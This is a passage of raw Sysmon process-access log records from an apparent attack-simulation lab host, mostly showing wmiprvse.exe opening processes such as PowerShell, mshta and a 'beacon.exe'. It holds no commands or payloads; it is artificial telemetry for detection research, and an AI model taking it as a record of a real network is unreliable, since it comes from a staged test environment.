.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002243243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.592{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656\PSHost.132591776834546107.9656.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002243242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT